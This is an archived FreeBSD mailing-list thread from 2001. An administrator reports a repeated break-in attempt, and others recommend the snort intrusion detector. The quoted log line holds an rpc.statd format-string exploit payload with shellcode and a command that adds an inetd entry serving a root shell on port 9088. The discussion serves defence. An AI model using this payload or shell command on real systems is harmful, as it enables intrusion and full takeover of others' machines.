Date: Thu, 4 Jan 2001 11:37:32 -0500 From: "Raymond Hicks" <rayhicks@UU.NET> To: "'Guy Helmer'" <ghelmer@palisadesys.com> Cc: <Eric_Stanfield@kenokozie.com>, <freebsd-questions@FreeBSD.ORG> Subject: RE: hack attempt (again) - help Message-ID: <003901c0766c$a3a06fc0$d7902799@sysenglt112> In-Reply-To: <Pine.LNX.4.21.0101040951330.10523-100000@magellan.palisadesys.com>
next in thread | previous in thread | raw e-mail | index | archive | help
yes.. i didnt see that suggestion till after I replied... snort is my recommendation as well.. -----Original Message----- From: Guy Helmer [mailto:ghelmer@palisadesys.com] Sent: Thursday, January 04, 2001 10:53 AM To: Raymond Hicks Cc: Eric_Stanfield@kenokozie.com; freebsd-questions@FreeBSD.ORG Subject: RE: hack attempt (again) - help On Thu, 4 Jan 2001, Raymond Hicks wrote: > why dont you just run a sniffer? snort is a sniffer with a lot of good stuff (TM) to find evil things. > -----Original Message----- > From: owner-freebsd-questions@FreeBSD.ORG > [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Guy Helmer > Sent: Thursday, January 04, 2001 10:26 AM > To: Eric_Stanfield@kenokozie.com > Cc: freebsd-questions@FreeBSD.ORG > Subject: Re: hack attempt (again) - help > > > On Thu, 4 Jan 2001 Eric_Stanfield@kenokozie.com wrote: > > > Alright this jerkoff has once again attempted to hack one of my freebsd > > machines by trying what I assume is a buffer overflow to rpc: > > > > Jan 3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon: > > ^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x %08x %08x > > %08x %08x %08x %08x %08x %08x %08x > > > %0242x%n%055x%n%012x%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM- > ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM- > ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM- > ^PëK^M- > > > > v¬M-^Cî M-^M^(M-^CÆ M- ^°M-^Cî M-^M^.M-^CÆ M-^Cà M-^Cë#M- ^´1ÀM-^Cî > > M-^HF'M-^HF*M-^CÆ M-^HF«M- F¸°+, M- óM-^MN¬M-^MV¸ÍM-^@1ÛM- > > Ø@ÍM-^@è°ÿÿÿ/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >> > > /tmp/m; /usr/sbin/inetd /tmp/m; > > > > The interesting bit is what he (she?) is attempting to sneak in at the end > > of the garbage sent to the port. > > > > I've given the system a thorough check and this seems to have been a > second > > failed attempt. I'm now annoyed, however, and would like to be able to at > > least log what address this stuff is originating from. Can anyone > suggest > > something from the ports that would do the trick? I've disabled nfs/rpc > > but I'm sure the hacker will come knocking again. > > snort with a current copy of the rule set from > http://www.whitehats.com/ids/index.html ought to detect this (and lots of > other script kiddie attempts). -- Guy Helmer, Ph.D. Sr. Software Engineer, Palisade Systems --- ghelmer@palisadesys.com http://www.palisadesys.com/~ghelmer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?003901c0766c$a3a06fc0$d7902799>